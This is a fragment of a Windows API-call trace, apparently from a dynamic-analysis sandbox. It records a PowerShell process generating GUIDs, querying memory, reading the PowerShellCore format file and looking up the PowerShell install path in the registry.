	[0349.381] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.381] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x2f31acbf, Data2=0xc19a, Data3=0x4287, Data4=([0]=0x98, [1]=0x9a, [2]=0x78, [3]=0x67, [4]=0x84, [5]=0xe8, [6]=0xff, [7]=0xd))) returned 0x0
	[0349.381] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xed51e9cc, Data2=0x81f5, Data3=0x470c, Data4=([0]=0x98, [1]=0x6d, [2]=0xbb, [3]=0x1c, [4]=0x3a, [5]=0x47, [6]=0xad, [7]=0x7b))) returned 0x0
	[0349.381] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd566fbce, Data2=0xe798, Data3=0x45ca, Data4=([0]=0x9e, [1]=0xc3, [2]=0xb2, [3]=0xe5, [4]=0x36, [5]=0x29, [6]=0x2a, [7]=0x1f))) returned 0x0
	[0349.382] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd810d5e3, Data2=0x5d25, Data3=0x4f1f, Data4=([0]=0x83, [1]=0x2c, [2]=0x87, [3]=0xdf, [4]=0x99, [5]=0x7, [6]=0x58, [7]=0x9f))) returned 0x0
	[0349.382] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x9ea5ba42, Data2=0xc094, Data3=0x4732, Data4=([0]=0x9e, [1]=0x76, [2]=0xb5, [3]=0x3f, [4]=0xd2, [5]=0x1d, [6]=0x63, [7]=0x32))) returned 0x0
	[0349.382] VirtualQuery (in: lpAddress=0xab9f0, lpBuffer=0xac8b0, dwLength=0x30 | out: lpBuffer=0xac8b0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.382] VirtualQuery (in: lpAddress=0xaba80, lpBuffer=0xac940, dwLength=0x30 | out: lpBuffer=0xac940*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.382] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xa461e2dd, Data2=0xe845, Data3=0x4355, Data4=([0]=0xa8, [1]=0x99, [2]=0xdc, [3]=0x41, [4]=0x20, [5]=0x7c, [6]=0x82, [7]=0x86))) returned 0x0
	[0349.382] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd9b2de80, Data2=0x5a39, Data3=0x4f6f, Data4=([0]=0xb9, [1]=0xd, [2]=0xd7, [3]=0xb5, [4]=0xf8, [5]=0x54, [6]=0x16, [7]=0x15))) returned 0x0
	[0349.382] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x65824681, Data2=0xbe78, Data3=0x4841, Data4=([0]=0xb9, [1]=0x29, [2]=0x29, [3]=0x7e, [4]=0x2c, [5]=0x4, [6]=0xb0, [7]=0x71))) returned 0x0
	[0349.383] SetErrorMode (uMode=0x1) returned 0x1
	[0349.383] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0349.383] SetErrorMode (uMode=0x1) returned 0x1
	[0349.383] GetFileType (hFile=0x328) returned 0x1
	[0349.383] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.384] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.384] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.384] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.384] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.384] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.384] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.384] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.385] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.385] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.385] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.385] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.385] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.385] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.386] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.386] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.386] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.386] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.386] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.387] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.387] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0349.387] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0xe67, lpOverlapped=0x0) returned 1
	[0349.387] ReadFile (in: hFile=0x328, lpBuffer=0x30b1b77, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b1b77*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0349.387] ReadFile (in: hFile=0x328, lpBuffer=0x30b25a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x30b25a8*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0349.387] SetErrorMode (uMode=0x1) returned 0x1
	[0349.387] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad180 | out: lpFileInformation=0xad180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0349.387] SetErrorMode (uMode=0x1) returned 0x1
	[0349.388] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad268 | out: phkResult=0xad268*=0x328) returned 0x0
	[0349.388] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1ec, lpData=0x0, lpcbData=0xad1e8*=0x0 | out: lpType=0xad1ec*=0x1, lpData=0x0, lpcbData=0xad1e8*=0x56) returned 0x0
	[0349.388] CoTaskMemAlloc (cb=0x5a) returned 0x27d1c0
	[0349.388] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1bc, lpData=0x27d1c0, lpcbData=0xad1b8*=0x56 | out: lpType=0xad1bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad1b8*=0x56) returned 0x0
	[0349.388] CoTaskMemFree (pv=0x27d1c0) 
	[0349.388] RegCloseKey (hKey=0x328) returned 0x0
	[0349.389] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x4f11a703, Data2=0x4d46, Data3=0x4ba7, Data4=([0]=0x8c, [1]=0xa0, [2]=0xc7, [3]=0x5d, [4]=0x82, [5]=0xc9, [6]=0x5f, [7]=0x69))) returned 0x0
	[0349.389] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xaae51a4, Data2=0xb667, Data3=0x41d9, Data4=([0]=0xac, [1]=0xf9, [2]=0xeb, [3]=0xc, [4]=0xf9, [5]=0xb8, [6]=0x96, [7]=0xfb))) returned 0x0
	[0349.389] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd25b70ec, Data2=0x55be, Data3=0x49ec, Data4=([0]=0xba, [1]=0x8, [2]=0x48, [3]=0x8, [4]=0xe7, [5]=0x1f, [6]=0x6f, [7]=0xa0))) returned 0x0
	[0349.389] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x5c6dccdf, Data2=0x63f, Data3=0x4424, Data4=([0]=0xb0, [1]=0xd4, [2]=0x7d, [3]=0x74, [4]=0x1b, [5]=0x4, [6]=0xaf, [7]=0x29))) returned 0x0
	[0349.390] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x9dc98005, Data2=0xa9d0, Data3=0x4fda, Data4=([0]=0xb1, [1]=0x63, [2]=0x9f, [3]=0xcb, [4]=0x38, [5]=0x22, [6]=0x51, [7]=0xe1))) returned 0x0
	[0349.390] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xb36cee46, Data2=0x9418, Data3=0x452d, Data4=([0]=0x83, [1]=0xcb, [2]=0x76, [3]=0x8, [4]=0xc1, [5]=0x8f, [6]=0x95, [7]=0xd9))) returned 0x0
	[0349.390] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x981687fd, Data2=0x8030, Data3=0x46aa, Data4=([0]=0xbf, [1]=0x71, [2]=0xe2, [3]=0x16, [4]=0x94, [5]=0xba, [6]=0x23, [7]=0xf6))) returned 0x0
	[0349.390] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.390] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x26d5780c, Data2=0xa341, Data3=0x46c1, Data4=([0]=0xac, [1]=0xb0, [2]=0x73, [3]=0x18, [4]=0x74, [5]=0xcb, [6]=0xf7, [7]=0x19))) returned 0x0
	[0349.390] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xaa4dad73, Data2=0xeb03, Data3=0x4200, Data4=([0]=0xa2, [1]=0x89, [2]=0xcb, [3]=0x59, [4]=0x67, [5]=0xd, [6]=0x3f, [7]=0x6d))) returned 0x0
	[0349.390] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x3259a510, Data2=0x1791, Data3=0x452e, Data4=([0]=0x9a, [1]=0xa9, [2]=0xdf, [3]=0x2d, [4]=0x27, [5]=0xb2, [6]=0x19, [7]=0x2f))) returned 0x0
	[0349.390] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x2960bd50, Data2=0x49e0, Data3=0x4334, Data4=([0]=0xa0, [1]=0xbb, [2]=0xbc, [3]=0x63, [4]=0x17, [5]=0xff, [6]=0xf1, [7]=0x88))) returned 0x0
	[0349.390] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xcd45f167, Data2=0x96f0, Data3=0x40dd, Data4=([0]=0x8e, [1]=0xf0, [2]=0xd7, [3]=0xe, [4]=0x92, [5]=0xbe, [6]=0x9f, [7]=0x90))) returned 0x0
	[0349.391] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x808b9053, Data2=0xa9aa, Data3=0x49ae, Data4=([0]=0xbc, [1]=0x36, [2]=0x17, [3]=0x85, [4]=0xb2, [5]=0xa5, [6]=0x40, [7]=0xdd))) returned 0x0
	[0349.391] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x63051e65, Data2=0xa1e6, Data3=0x4c13, Data4=([0]=0x9f, [1]=0x3d, [2]=0xd4, [3]=0x7d, [4]=0x51, [5]=0x11, [6]=0x31, [7]=0x21))) returned 0x0
	[0349.391] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x31cc48b7, Data2=0x3cb8, Data3=0x40e8, Data4=([0]=0x8a, [1]=0x46, [2]=0x61, [3]=0x27, [4]=0xc, [5]=0x2c, [6]=0xa5, [7]=0x15))) returned 0x0
	[0349.391] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x1a526fc8, Data2=0x5b2a, Data3=0x41e8, Data4=([0]=0x88, [1]=0x54, [2]=0xad, [3]=0xe2, [4]=0xb8, [5]=0xf0, [6]=0x12, [7]=0x2d))) returned 0x0
	[0349.391] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xcaee9cc7, Data2=0x3ce2, Data3=0x4cf5, Data4=([0]=0xa9, [1]=0x3f, [2]=0x43, [3]=0x62, [4]=0xb8, [5]=0x9a, [6]=0xdc, [7]=0x1c))) returned 0x0
	[0349.391] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x63d3ca76, Data2=0x400b, Data3=0x4fb7, Data4=([0]=0xad, [1]=0x19, [2]=0xc3, [3]=0x89, [4]=0x9, [5]=0xff, [6]=0x83, [7]=0xa7))) returned 0x0
	[0349.391] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x86ba92af, Data2=0x16f6, Data3=0x41e0, Data4=([0]=0x95, [1]=0xc4, [2]=0x56, [3]=0x92, [4]=0x24, [5]=0x47, [6]=0x96, [7]=0x54))) returned 0x0
	[0349.391] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.391] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.392] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.392] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xa764f695, Data2=0x82aa, Data3=0x4efd, Data4=([0]=0x8a, [1]=0xc0, [2]=0x16, [3]=0x22, [4]=0xc5, [5]=0xd5, [6]=0x61, [7]=0xd4))) returned 0x0
	[0349.392] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x2d28a053, Data2=0xf38b, Data3=0x4bbb, Data4=([0]=0xa4, [1]=0x8b, [2]=0xbf, [3]=0x14, [4]=0x76, [5]=0xd, [6]=0x17, [7]=0x11))) returned 0x0
	[0349.392] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x52b3e127, Data2=0xa99e, Data3=0x4641, Data4=([0]=0x8c, [1]=0x7, [2]=0x7b, [3]=0xa7, [4]=0xd1, [5]=0xfa, [6]=0x9c, [7]=0x64))) returned 0x0
	[0349.392] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x4dcaa93f, Data2=0xee83, Data3=0x46a2, Data4=([0]=0xb4, [1]=0x3f, [2]=0xcf, [3]=0xda, [4]=0xde, [5]=0x64, [6]=0x1d, [7]=0x0))) returned 0x0
	[0349.392] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xfc47bc61, Data2=0xf7b4, Data3=0x4d7e, Data4=([0]=0xa9, [1]=0x5, [2]=0x56, [3]=0xb4, [4]=0x19, [5]=0x71, [6]=0xa9, [7]=0xfd))) returned 0x0
	[0349.392] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x44352874, Data2=0x580d, Data3=0x4815, Data4=([0]=0xbf, [1]=0x85, [2]=0x3e, [3]=0x42, [4]=0xc4, [5]=0x6d, [6]=0xb5, [7]=0x60))) returned 0x0
	[0349.392] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xbc8c7ae4, Data2=0xa76e, Data3=0x49a9, Data4=([0]=0xab, [1]=0xf4, [2]=0x3b, [3]=0x26, [4]=0x78, [5]=0x3e, [6]=0x40, [7]=0xb))) returned 0x0
	[0349.392] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x44f1dd81, Data2=0xf8c9, Data3=0x417b, Data4=([0]=0xbe, [1]=0xb1, [2]=0x74, [3]=0x7a, [4]=0xfa, [5]=0xef, [6]=0xe1, [7]=0x41))) returned 0x0
	[0349.392] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xcbaf140e, Data2=0xb118, Data3=0x4b9c, Data4=([0]=0xb2, [1]=0xe4, [2]=0xc5, [3]=0x4f, [4]=0xb3, [5]=0xc1, [6]=0xa0, [7]=0xda))) returned 0x0
	[0349.393] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x5dbbef, Data2=0x7b62, Data3=0x411f, Data4=([0]=0x9e, [1]=0x89, [2]=0xde, [3]=0x4c, [4]=0x97, [5]=0xe3, [6]=0xd3, [7]=0xe9))) returned 0x0
	[0349.393] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x8811831e, Data2=0xb34a, Data3=0x425c, Data4=([0]=0x8a, [1]=0xba, [2]=0xc4, [3]=0x1f, [4]=0x63, [5]=0xec, [6]=0xc, [7]=0xd5))) returned 0x0
	[0349.393] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x4a1386a7, Data2=0xdf78, Data3=0x4f96, Data4=([0]=0x8e, [1]=0x85, [2]=0x48, [3]=0xec, [4]=0x67, [5]=0x4b, [6]=0xcb, [7]=0x11))) returned 0x0
	[0349.393] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x80d51478, Data2=0x4770, Data3=0x4c2d, Data4=([0]=0x84, [1]=0x12, [2]=0x82, [3]=0xb4, [4]=0x8d, [5]=0xab, [6]=0xfa, [7]=0x66))) returned 0x0
	[0349.393] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.393] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x4e9a, Data2=0xfb9a, Data3=0x4393, Data4=([0]=0xb6, [1]=0xc9, [2]=0x4e, [3]=0x98, [4]=0xbe, [5]=0xe8, [6]=0x5f, [7]=0xc8))) returned 0x0
	[0349.393] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.394] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.394] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x8fea4547, Data2=0x8fce, Data3=0x41b4, Data4=([0]=0xbe, [1]=0x3e, [2]=0xb4, [3]=0x66, [4]=0x4a, [5]=0x6a, [6]=0x65, [7]=0x59))) returned 0x0
	[0349.395] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.395] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x53f69172, Data2=0xc9f4, Data3=0x4ebb, Data4=([0]=0xa7, [1]=0xfd, [2]=0x52, [3]=0xc8, [4]=0x2f, [5]=0x7b, [6]=0x51, [7]=0xef))) returned 0x0
	[0349.395] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd13da464, Data2=0xe2f3, Data3=0x4076, Data4=([0]=0x90, [1]=0x9d, [2]=0xd2, [3]=0x95, [4]=0xaf, [5]=0xcd, [6]=0x5d, [7]=0x8c))) returned 0x0
	[0349.395] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xcb5cb64c, Data2=0x84bf, Data3=0x4ada, Data4=([0]=0x9c, [1]=0xba, [2]=0x11, [3]=0xa1, [4]=0xa5, [5]=0x23, [6]=0x9, [7]=0x98))) returned 0x0
	[0349.395] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x923c1deb, Data2=0x2dfc, Data3=0x4873, Data4=([0]=0x8f, [1]=0x10, [2]=0xa6, [3]=0x72, [4]=0x48, [5]=0x31, [6]=0x44, [7]=0xa8))) returned 0x0
	[0349.395] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xb3901e8b, Data2=0x1444, Data3=0x4589, Data4=([0]=0xad, [1]=0x7f, [2]=0xea, [3]=0x72, [4]=0x81, [5]=0xb0, [6]=0x86, [7]=0x17))) returned 0x0
	[0349.395] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xf63339a6, Data2=0x428b, Data3=0x4f83, Data4=([0]=0x84, [1]=0x92, [2]=0x35, [3]=0x39, [4]=0x9e, [5]=0x6a, [6]=0x2a, [7]=0x8a))) returned 0x0
	[0349.395] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x30c9d80e, Data2=0x7f39, Data3=0x4e51, Data4=([0]=0x90, [1]=0xc, [2]=0x31, [3]=0xf5, [4]=0x5d, [5]=0xdf, [6]=0x30, [7]=0x1))) returned 0x0
	[0349.396] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.396] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x77cbfeec, Data2=0x7f94, Data3=0x4b00, Data4=([0]=0x80, [1]=0xdb, [2]=0xbb, [3]=0xc5, [4]=0x14, [5]=0x33, [6]=0xbc, [7]=0x62))) returned 0x0
	[0349.396] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xf6ad1aa9, Data2=0x23c5, Data3=0x40ce, Data4=([0]=0xae, [1]=0x4e, [2]=0x96, [3]=0x93, [4]=0x6f, [5]=0x96, [6]=0x57, [7]=0x31))) returned 0x0
	[0349.396] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd198f2f9, Data2=0x2774, Data3=0x448a, Data4=([0]=0x95, [1]=0x1b, [2]=0x90, [3]=0xba, [4]=0x76, [5]=0xd6, [6]=0x9b, [7]=0x65))) returned 0x0
	[0349.396] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x4cb18e84, Data2=0x6590, Data3=0x4f46, Data4=([0]=0xa2, [1]=0x14, [2]=0x59, [3]=0xfa, [4]=0x3a, [5]=0x1a, [6]=0x98, [7]=0x28))) returned 0x0
